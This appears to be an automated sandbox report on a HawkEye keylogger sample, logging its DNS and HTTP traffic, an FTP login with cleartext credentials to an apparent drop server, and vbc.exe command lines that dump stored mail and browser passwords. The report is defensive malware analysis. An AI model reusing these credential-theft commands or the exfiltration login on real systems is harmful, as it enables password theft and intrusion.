Jul 4, 2021 09:24:20.749830008 CEST	53	51726	8.8.8.8	192.168.2.4
Jul 4, 2021 09:24:21.608794928 CEST	56794	53	192.168.2.4	8.8.8.8
Jul 4, 2021 09:24:21.658792019 CEST	53	56794	8.8.8.8	192.168.2.4
Jul 4, 2021 09:24:22.462620974 CEST	56534	53	192.168.2.4	8.8.8.8
Jul 4, 2021 09:24:22.512300968 CEST	53	56534	8.8.8.8	192.168.2.4
Jul 4, 2021 09:24:23.505507946 CEST	56627	53	192.168.2.4	8.8.8.8
Jul 4, 2021 09:24:23.560817003 CEST	53	56627	8.8.8.8	192.168.2.4
Jul 4, 2021 09:24:23.793838024 CEST	56621	53	192.168.2.4	8.8.8.8
Jul 4, 2021 09:24:23.843069077 CEST	53	56621	8.8.8.8	192.168.2.4
Jul 4, 2021 09:24:23.871434927 CEST	63116	53	192.168.2.4	8.8.8.8
Jul 4, 2021 09:24:23.928759098 CEST	53	63116	8.8.8.8	192.168.2.4
Jul 4, 2021 09:24:25.219572067 CEST	64078	53	192.168.2.4	8.8.8.8
Jul 4, 2021 09:24:25.267179012 CEST	53	64078	8.8.8.8	192.168.2.4
Jul 4, 2021 09:24:26.040180922 CEST	64801	53	192.168.2.4	8.8.8.8
Jul 4, 2021 09:24:26.090580940 CEST	53	64801	8.8.8.8	192.168.2.4
Jul 4, 2021 09:24:26.920576096 CEST	61721	53	192.168.2.4	8.8.8.8
Jul 4, 2021 09:24:26.967803955 CEST	53	61721	8.8.8.8	192.168.2.4
Jul 4, 2021 09:24:27.824677944 CEST	51255	53	192.168.2.4	8.8.8.8
Jul 4, 2021 09:24:27.880892038 CEST	53	51255	8.8.8.8	192.168.2.4
Jul 4, 2021 09:24:31.722667933 CEST	61522	53	192.168.2.4	8.8.8.8
Jul 4, 2021 09:24:31.777364016 CEST	53	61522	8.8.8.8	192.168.2.4
Jul 4, 2021 09:24:36.508505106 CEST	52337	53	192.168.2.4	8.8.8.8
Jul 4, 2021 09:24:36.569874048 CEST	53	52337	8.8.8.8	192.168.2.4
Jul 4, 2021 09:24:37.979161024 CEST	55046	53	192.168.2.4	8.8.8.8
Jul 4, 2021 09:24:38.036003113 CEST	53	55046	8.8.8.8	192.168.2.4
Jul 4, 2021 09:24:58.077002048 CEST	49612	53	192.168.2.4	8.8.8.8
Jul 4, 2021 09:24:58.217092991 CEST	53	49612	8.8.8.8	192.168.2.4
Jul 4, 2021 09:24:58.828026056 CEST	49285	53	192.168.2.4	8.8.8.8
Jul 4, 2021 09:24:58.884083033 CEST	53	49285	8.8.8.8	192.168.2.4
Jul 4, 2021 09:24:59.092572927 CEST	50601	53	192.168.2.4	8.8.8.8
Jul 4, 2021 09:24:59.164423943 CEST	53	50601	8.8.8.8	192.168.2.4
Jul 4, 2021 09:24:59.727792025 CEST	60875	53	192.168.2.4	8.8.8.8
Jul 4, 2021 09:24:59.785470009 CEST	53	60875	8.8.8.8	192.168.2.4
Jul 4, 2021 09:25:00.398696899 CEST	56448	53	192.168.2.4	8.8.8.8
Jul 4, 2021 09:25:00.521862984 CEST	53	56448	8.8.8.8	192.168.2.4
Jul 4, 2021 09:25:01.148196936 CEST	59172	53	192.168.2.4	8.8.8.8
Jul 4, 2021 09:25:01.206320047 CEST	53	59172	8.8.8.8	192.168.2.4
Jul 4, 2021 09:25:01.758502007 CEST	62420	53	192.168.2.4	8.8.8.8
Jul 4, 2021 09:25:01.815361977 CEST	53	62420	8.8.8.8	192.168.2.4
Jul 4, 2021 09:25:02.812670946 CEST	60579	53	192.168.2.4	8.8.8.8
Jul 4, 2021 09:25:02.867623091 CEST	53	60579	8.8.8.8	192.168.2.4
Jul 4, 2021 09:25:03.942595959 CEST	50183	53	192.168.2.4	8.8.8.8
Jul 4, 2021 09:25:03.997700930 CEST	53	50183	8.8.8.8	192.168.2.4
Jul 4, 2021 09:25:04.952756882 CEST	61531	53	192.168.2.4	8.8.8.8
Jul 4, 2021 09:25:05.011591911 CEST	53	61531	8.8.8.8	192.168.2.4
Jul 4, 2021 09:25:05.659168959 CEST	49228	53	192.168.2.4	8.8.8.8
Jul 4, 2021 09:25:05.710871935 CEST	53	49228	8.8.8.8	192.168.2.4
Jul 4, 2021 09:25:13.021723032 CEST	59794	53	192.168.2.4	8.8.8.8
Jul 4, 2021 09:25:13.085916996 CEST	53	59794	8.8.8.8	192.168.2.4
Jul 4, 2021 09:25:13.119164944 CEST	55916	53	192.168.2.4	8.8.8.8
Jul 4, 2021 09:25:13.176852942 CEST	53	55916	8.8.8.8	192.168.2.4
Jul 4, 2021 09:25:15.518848896 CEST	52752	53	192.168.2.4	8.8.8.8
Jul 4, 2021 09:25:15.577300072 CEST	53	52752	8.8.8.8	192.168.2.4
Jul 4, 2021 09:25:47.317270041 CEST	60542	53	192.168.2.4	8.8.8.8
Jul 4, 2021 09:25:47.372250080 CEST	53	60542	8.8.8.8	192.168.2.4
Jul 4, 2021 09:25:49.665396929 CEST	60689	53	192.168.2.4	8.8.8.8
Jul 4, 2021 09:25:49.722285986 CEST	53	60689	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jul 4, 2021 09:24:23.505507946 CEST	192.168.2.4	8.8.8.8	0x4ccc	Standard query (0)	123.105.12.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Jul 4, 2021 09:24:23.871434927 CEST	192.168.2.4	8.8.8.8	0x2941	Standard query (0)	whatismyipaddress.com	A (IP address)	IN (0x0001)
Jul 4, 2021 09:24:36.508505106 CEST	192.168.2.4	8.8.8.8	0x4d4a	Standard query (0)	ftp.bigcountrywater.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jul 4, 2021 09:24:23.560817003 CEST	8.8.8.8	192.168.2.4	0x4ccc	Name error (3)	123.105.12.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)
Jul 4, 2021 09:24:23.928759098 CEST	8.8.8.8	192.168.2.4	0x2941	No error (0)	whatismyipaddress.com		104.16.155.36	A (IP address)	IN (0x0001)
Jul 4, 2021 09:24:23.928759098 CEST	8.8.8.8	192.168.2.4	0x2941	No error (0)	whatismyipaddress.com		104.16.154.36	A (IP address)	IN (0x0001)
Jul 4, 2021 09:24:36.569874048 CEST	8.8.8.8	192.168.2.4	0x4d4a	No error (0)	ftp.bigcountrywater.com	bigcountrywater.com		CNAME (Canonical name)	IN (0x0001)
Jul 4, 2021 09:24:36.569874048 CEST	8.8.8.8	192.168.2.4	0x4d4a	No error (0)	bigcountrywater.com		155.254.17.54	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

whatismyipaddress.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49742	104.16.155.36	80	C:\Users\user\Desktop\UMUNNA1.exe

Timestamp	kBytes transferred	Direction	Data
Jul 4, 2021 09:24:24.024159908 CEST	1311	OUT	GET / HTTP/1.1 Host: whatismyipaddress.com Connection: Keep-Alive
Jul 4, 2021 09:24:24.071033955 CEST	1312	IN	HTTP/1.1 403 Forbidden Date: Sun, 04 Jul 2021 07:24:24 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 16 Connection: keep-alive X-Frame-Options: SAMEORIGIN Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT cf-request-id: 0b12008473000006058f26c000000001 Server: cloudflare CF-RAY: 66969d1a5f4e0605-FRA alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400 Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020

FTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Jul 4, 2021 09:24:36.970735073 CEST	21	49748	155.254.17.54	192.168.2.4	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 00:24. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 00:24. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 00:24. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 00:24. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
Jul 4, 2021 09:24:36.971132040 CEST	49748	21	192.168.2.4	155.254.17.54	USER uka123456@bigcountrywater.com
Jul 4, 2021 09:24:37.170186043 CEST	21	49748	155.254.17.54	192.168.2.4	331 User uka123456@bigcountrywater.com OK. Password required
Jul 4, 2021 09:24:37.170418024 CEST	49748	21	192.168.2.4	155.254.17.54	PASS pwd12345
Jul 4, 2021 09:24:41.608633041 CEST	21	49748	155.254.17.54	192.168.2.4	530 Login authentication failed
Jul 4, 2021 09:24:41.809349060 CEST	21	49748	155.254.17.54	192.168.2.4	530 Logout.

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: UMUNNA1.exe PID: 6940 Parent PID: 6004

General

Start time:	09:24:14
Start date:	04/07/2021
Path:	C:\Users\user\Desktop\UMUNNA1.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\UMUNNA1.exe'
Imagebase:	0x540000
File size:	715264 bytes
MD5 hash:	88FD4CF81A72A7A8642B4E248626BD28
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000000.00000002.670247013.0000000003BD1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000002.670247013.0000000003BD1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000002.670247013.0000000003BD1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000000.00000002.670247013.0000000003BD1000.00000004.00000001.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000000.00000002.670247013.0000000003BD1000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: UMUNNA1.exe PID: 5052 Parent PID: 6940

General

Start time:	09:24:21
Start date:	04/07/2021
Path:	C:\Users\user\Desktop\UMUNNA1.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\UMUNNA1.exe
Imagebase:	0x3b0000
File size:	715264 bytes
MD5 hash:	88FD4CF81A72A7A8642B4E248626BD28
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000004.00000002.925540625.00000000066C0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000004.00000002.925557781.0000000006810000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000004.00000002.919651552.0000000000832000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000004.00000002.919651552.0000000000832000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000004.00000002.919651552.0000000000832000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000004.00000002.919651552.0000000000832000.00000040.00000001.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000004.00000002.919651552.0000000000832000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000004.00000002.923406374.0000000003B61000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000004.00000002.923406374.0000000003B61000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000004.00000002.922393547.0000000002B61000.00000004.00000001.sdmp, Author: Joe Security Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000004.00000002.922393547.0000000002B61000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: vbc.exe PID: 4116 Parent PID: 5052

General

Start time:	09:24:27
Start date:	04/07/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
Imagebase:	0x400000
File size:	1171592 bytes
MD5 hash:	C63ED21D5706A527419C9FBD730FFB2E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000002.682749011.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: vbc.exe PID: 660 Parent PID: 5052

General

Start time:	09:24:27
Start date:	04/07/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
Imagebase:	0x400000
File size:	1171592 bytes
MD5 hash:	C63ED21D5706A527419C9FBD730FFB2E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000006.00000002.688595177.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: UMUNNA1.exe PID: 6940 Parent PID: 6004 UMUNNA1.exeCOMMON

Executed Functions

Function 04DB5180, Relevance: 1.6, Strings: 1, Instructions: 363COMMON

Download Yara Rule

Strings

3333, xrefs: 04DB552F

Memory Dump Source

Source File: 00000000.00000002.671979167.0000000004DB0000.00000040.00000001.sdmp, Offset: 04DB0000, based on PE: false

Similarity

API ID:
String ID: 3333
API String ID: 0-2924271548
Opcode ID: cc9ab563609a3fd02b717a7eedd99dda987810b7a04364b458a01dba92e9b51f
Instruction ID: f537389e8713f152e2c6aa4261a9f19ff3774aea1056f263ad1d59d65a660e22
Opcode Fuzzy Hash: cc9ab563609a3fd02b717a7eedd99dda987810b7a04364b458a01dba92e9b51f
Instruction Fuzzy Hash: 27D10871A09754EBD7016F51E86879ABBF1FF89304F0244A9E8C697262EE31D814C7D3

Uniqueness

Uniqueness Score: -1.00%

Function 04FE0E3B, Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 04FE0EBB

Memory Dump Source

Source File: 00000000.00000002.673106645.0000000004FE0000.00000040.00000001.sdmp, Offset: 04FE0000, based on PE: false

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 6db6f7068d9f71acfde76a7b066839c4999805f359ce7de9cbdf876714858fce
Instruction ID: 23423c865ed47a465adf5f375b14f4d7b0d26b4eb72e76ac4eb7819d5267440d
Opcode Fuzzy Hash: 6db6f7068d9f71acfde76a7b066839c4999805f359ce7de9cbdf876714858fce
Instruction Fuzzy Hash: 6421A1765097849FDB228F25DC44B52BFF4EF06310F0884EAE9858F563D270A918CB62

Uniqueness

Uniqueness Score: -1.00%

Function 04FE0E72, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 04FE0EBB

Memory Dump Source

Source File: 00000000.00000002.673106645.0000000004FE0000.00000040.00000001.sdmp, Offset: 04FE0000, based on PE: false

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 48f1823dccc52aa62d904d2df2ff51c7c65dd8302e69ad3c534e5d7a497b0d6e
Instruction ID: c42dfadc886669326df33a886a2b035af17baede3a8dca95cf127af532d2ab5f
Opcode Fuzzy Hash: 48f1823dccc52aa62d904d2df2ff51c7c65dd8302e69ad3c534e5d7a497b0d6e
Instruction Fuzzy Hash: 8F115E726003449FDB208F5AD984B66FBE4EF04221F08847ADD858B652E775E418DB61

Uniqueness

Uniqueness Score: -1.00%

Function 04DB79B0, Relevance: .4, Instructions: 414COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.671979167.0000000004DB0000.00000040.00000001.sdmp, Offset: 04DB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2325aa36adcf167c36bb2c1de34e9fa0de7715e7c448c9e63f0252ece1e6918
Instruction ID: 0cde09224cd160b347c69f2073727830f7f08684847f9bd229117e4b48fbdef3
Opcode Fuzzy Hash: f2325aa36adcf167c36bb2c1de34e9fa0de7715e7c448c9e63f0252ece1e6918
Instruction Fuzzy Hash: 68D12532B042655FCB11CB7D8C94ABFBBB6EBC5350F05863AD885EB285EA755805C3E0

Uniqueness

Uniqueness Score: -1.00%

Function 04DB0318, Relevance: 3.9, Strings: 3, Instructions: 103COMMON

Download Yara Rule

Strings

>_kq, xrefs: 04DB040E
f]kq, xrefs: 04DB0354
:@fq, xrefs: 04DB03F7

Memory Dump Source

Source File: 00000000.00000002.671979167.0000000004DB0000.00000040.00000001.sdmp, Offset: 04DB0000, based on PE: false

Similarity

API ID:
String ID: :@fq$>_kq$f]kq
API String ID: 0-1744552541
Opcode ID: eeb7d6ae0b246608ceb148598702d905a32137cf42fd8f0cec878269a5e308c6
Instruction ID: c8b28eed34a3123e95e7ffa07a4455d1bab20f04790a752436b70b6caefbf4f3
Opcode Fuzzy Hash: eeb7d6ae0b246608ceb148598702d905a32137cf42fd8f0cec878269a5e308c6
Instruction Fuzzy Hash: 164172306066498FC354EF7FE9593A9BBE2BFC5304F24852DC1045B2AAEF744A19CB51

Uniqueness

Uniqueness Score: -1.00%

Function 04DB0328, Relevance: 3.8, Strings: 3, Instructions: 95COMMON

Download Yara Rule

Strings

>_kq, xrefs: 04DB040E
f]kq, xrefs: 04DB0354
:@fq, xrefs: 04DB03F7

Memory Dump Source

Source File: 00000000.00000002.671979167.0000000004DB0000.00000040.00000001.sdmp, Offset: 04DB0000, based on PE: false

Similarity

API ID:
String ID: :@fq$>_kq$f]kq
API String ID: 0-1744552541
Opcode ID: a288ea20c1318fb8835908b07e258aff4f82c3f959a5ec5f5f39b93c47549866
Instruction ID: d71091e63fa218f9a27db21463d5ec558ec391ab1493fa6dac2cf4d7190d8d49
Opcode Fuzzy Hash: a288ea20c1318fb8835908b07e258aff4f82c3f959a5ec5f5f39b93c47549866
Instruction Fuzzy Hash: 1F4132306026498FC354EF7FD9593AABBE6BBC5304F20852DD1045B2ADEF744A19CB51

Uniqueness

Uniqueness Score: -1.00%

Function 04DB5E20, Relevance: 2.1, Strings: 1, Instructions: 813COMMON

Download Yara Rule

Strings

W0q^, xrefs: 04DB69AD, 04DB69B2

Memory Dump Source

Source File: 00000000.00000002.671979167.0000000004DB0000.00000040.00000001.sdmp, Offset: 04DB0000, based on PE: false

Similarity

API ID:
String ID: W0q^
API String ID: 0-3240669060
Opcode ID: 661722594e4cf5bbabbb7daf94a55061482547283bc690b34d24030eaf2859a3
Instruction ID: 51f328316b8efea24fd237ceb9486bda448cd399d20d9545a299dbe6d2d76da5
Opcode Fuzzy Hash: 661722594e4cf5bbabbb7daf94a55061482547283bc690b34d24030eaf2859a3
Instruction Fuzzy Hash: 39725F30B00115CBCB24DF69C994BADB7B2BF88300F6485AAD5469B399DB30ED55CF91

Uniqueness

Uniqueness Score: -1.00%

Function 04DB5E10, Relevance: 2.0, Strings: 1, Instructions: 772COMMON

Download Yara Rule

Strings

W0q^, xrefs: 04DB69AD, 04DB69B2

Memory Dump Source

Source File: 00000000.00000002.671979167.0000000004DB0000.00000040.00000001.sdmp, Offset: 04DB0000, based on PE: false

Similarity

API ID:
String ID: W0q^
API String ID: 0-3240669060
Opcode ID: d04ee30a45523138b814ea7292ff2272f922044063f93d56aabecea53566053d
Instruction ID: 482c13d26d114867604d7da5e8e580fdefbcdf9c21fb184255332cbdaf522392
Opcode Fuzzy Hash: d04ee30a45523138b814ea7292ff2272f922044063f93d56aabecea53566053d
Instruction Fuzzy Hash: 16625030B00115CBCB24DF69C994BADB7B2BF88300F6485AAD5469B399DB30ED55CF91

Uniqueness

Uniqueness Score: -1.00%

Function 04DB5E48, Relevance: 2.0, Strings: 1, Instructions: 742COMMON

Download Yara Rule

Strings

W0q^, xrefs: 04DB69AD, 04DB69B2

Memory Dump Source

Source File: 00000000.00000002.671979167.0000000004DB0000.00000040.00000001.sdmp, Offset: 04DB0000, based on PE: false

Similarity

API ID:
String ID: W0q^
API String ID: 0-3240669060
Opcode ID: a2def002232be47580c60fd8dd9a71365b867347590edf97720d3ce13442da70
Instruction ID: 3452c58fece88bcbed636b0cad7f3611098e53a6fb4c70ca6179623aad9f3d50
Opcode Fuzzy Hash: a2def002232be47580c60fd8dd9a71365b867347590edf97720d3ce13442da70
Instruction Fuzzy Hash: 0E625F30A00115CBCF24DF69C9947ADB7B2BF88300F6885AAD5469B399DB30ED65CF91

Uniqueness

Uniqueness Score: -1.00%

Function 04DB7E08, Relevance: 1.7, Strings: 1, Instructions: 406COMMON

Download Yara Rule

Strings

>_kq, xrefs: 04DB7F9B

Memory Dump Source

Source File: 00000000.00000002.671979167.0000000004DB0000.00000040.00000001.sdmp, Offset: 04DB0000, based on PE: false

Similarity

API ID:
String ID: >_kq
API String ID: 0-4149988037
Opcode ID: e19936ba7462ea2f6a4fcf563a197988b205250ed4827a4ea227d40d83d6abb9
Instruction ID: d6fba5e9e5ffa072ce012ece9120e373167d254385e0dc08fdb7e06b2d6fc4fe
Opcode Fuzzy Hash: e19936ba7462ea2f6a4fcf563a197988b205250ed4827a4ea227d40d83d6abb9
Instruction Fuzzy Hash: E6E17D35B002199FCB05DFA8C894AADBBB6FF88300F148469E509AF355DB35ED06DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00EEACE2, Relevance: 1.6, APIs: 1, Instructions: 92registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 00EEAD91

Memory Dump Source

Source File: 00000000.00000002.669369800.0000000000EEA000.00000040.00000001.sdmp, Offset: 00EEA000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: a07c2391601fda29b47df1300aff41630cf472659b7f94a3a9e6cfde10b20e86
Instruction ID: b90f1db15a22a2f8a6bcd97f763eb84373fb1c3bad3da1f1f68fbc59fead5854
Opcode Fuzzy Hash: a07c2391601fda29b47df1300aff41630cf472659b7f94a3a9e6cfde10b20e86
Instruction Fuzzy Hash: 0431B4B25047846FE7228F25CC45FA7BFECEF06710F0885AAED819B152D264E909CB71

Uniqueness

Uniqueness Score: -1.00%

Function 00EEADD9, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E2C,9716DC5B,00000000,00000000,00000000,00000000), ref: 00EEAE94

Memory Dump Source

Source File: 00000000.00000002.669369800.0000000000EEA000.00000040.00000001.sdmp, Offset: 00EEA000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: c7746764b765c3c36fca6d0e45cc5f7932c2263ce8ea7fa6e6f7f76a6b8a4f8b
Instruction ID: d3f5f5f5fa0d67050f7b9054b559b683c6fe9f3fd0254ceca92d83c5e58dbca6
Opcode Fuzzy Hash: c7746764b765c3c36fca6d0e45cc5f7932c2263ce8ea7fa6e6f7f76a6b8a4f8b
Instruction Fuzzy Hash: 4831B3711083846FD722CF21CC44F52BFF8EF06314F0884AAE9859B163D260E948CB61

Uniqueness

Uniqueness Score: -1.00%

Function 04FE0FFC, Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,00000E2C,9716DC5B,00000000,00000000,00000000,00000000), ref: 04FE1096

Memory Dump Source

Source File: 00000000.00000002.673106645.0000000004FE0000.00000040.00000001.sdmp, Offset: 04FE0000, based on PE: false

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: 59b03239257744e18b12bc3d211e13847590e03896914928bde02962d915edf8
Instruction ID: 1593ae4402e6e2aa38ad6bb3e302b08652bb3737263c564c058fd93dbea9076b
Opcode Fuzzy Hash: 59b03239257744e18b12bc3d211e13847590e03896914928bde02962d915edf8
Instruction Fuzzy Hash: 9421B6B25093846FE7128F65DD45B66BFB8EF06320F08849BE985DB153C274E905C761

Uniqueness

Uniqueness Score: -1.00%

Function 04FE10F5, Relevance: 1.6, APIs: 1, Instructions: 82COMMON

Download Yara Rule

APIs

K32GetModuleInformation.KERNEL32(?,00000E2C,9716DC5B,00000000,00000000,00000000,00000000), ref: 04FE1186

Memory Dump Source

Source File: 00000000.00000002.673106645.0000000004FE0000.00000040.00000001.sdmp, Offset: 04FE0000, based on PE: false

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: ed238900f4e4455fa8913e530865420eeb6eafe93a856728cdca71c6b36ee08e
Instruction ID: 58a2e0021be260df23522e77fae9cd766ccc04f81f7abb53cb93b9fc1c568138
Opcode Fuzzy Hash: ed238900f4e4455fa8913e530865420eeb6eafe93a856728cdca71c6b36ee08e
Instruction Fuzzy Hash: 9B2194715053846FE722CF26CD45F66BFACEF06310F0884AAE945DB152D275E909CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00EEA2AC, Relevance: 1.6, APIs: 1, Instructions: 82COMMON

Download Yara Rule

APIs

SetConsoleCtrlHandler.KERNELBASE(?,00000E2C,?,?), ref: 00EEA346

Memory Dump Source

Source File: 00000000.00000002.669369800.0000000000EEA000.00000040.00000001.sdmp, Offset: 00EEA000, based on PE: false

Similarity

API ID: ConsoleCtrlHandler
String ID:
API String ID: 1513847179-0
Opcode ID: 964123a7245986535628547bd161474153dee955cf8c55c2e531bd7721323cc4
Instruction ID: 4061054da659e38cf3b7aba29ec75883e4059aeb8664467e1eddedb779386a16
Opcode Fuzzy Hash: 964123a7245986535628547bd161474153dee955cf8c55c2e531bd7721323cc4
Instruction Fuzzy Hash: 8A21B77140D3C06FD7138B259C51B22BFB4EF47614F0A40DBE984DB5A3D225A919C772

Uniqueness

Uniqueness Score: -1.00%

Function 04FE11EC, Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

K32GetModuleFileNameExW.KERNEL32(?,00000E2C,?,?), ref: 04FE1292

Memory Dump Source

Source File: 00000000.00000002.673106645.0000000004FE0000.00000040.00000001.sdmp, Offset: 04FE0000, based on PE: false

Similarity

API ID: FileModuleName
String ID:
API String ID: 514040917-0
Opcode ID: 2f741380c3a707f90591f2929dca647674e9d94245781f210c3a5dedf5ae74fb
Instruction ID: 00de2d52446b9f5c817111a78e6040252563e3d3d9fd69c7a66dd47d8b27939e
Opcode Fuzzy Hash: 2f741380c3a707f90591f2929dca647674e9d94245781f210c3a5dedf5ae74fb
Instruction Fuzzy Hash: A221AD714093C46FD7128B65CC55B66BFB8EF87610F0984DBD8848B1A3D224A919CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00EEAD12, Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 00EEAD91

Memory Dump Source

Source File: 00000000.00000002.669369800.0000000000EEA000.00000040.00000001.sdmp, Offset: 00EEA000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: efd1a9791dc807b5378929a4e2e1be5f4763e8167f54a9e168e567352123e490
Instruction ID: 0572843f46d096b217e46717839b039eb87e7e42e2fe473afdc0b38249e43042
Opcode Fuzzy Hash: efd1a9791dc807b5378929a4e2e1be5f4763e8167f54a9e168e567352123e490
Instruction Fuzzy Hash: 1B21D772500748AFE7218F55CC84F6BFBECEF04310F18846AED419B641D664E504CB72

Uniqueness

Uniqueness Score: -1.00%

Function 04FE0CBE, Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 04FE0D3A

Memory Dump Source

Source File: 00000000.00000002.673106645.0000000004FE0000.00000040.00000001.sdmp, Offset: 04FE0000, based on PE: false

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
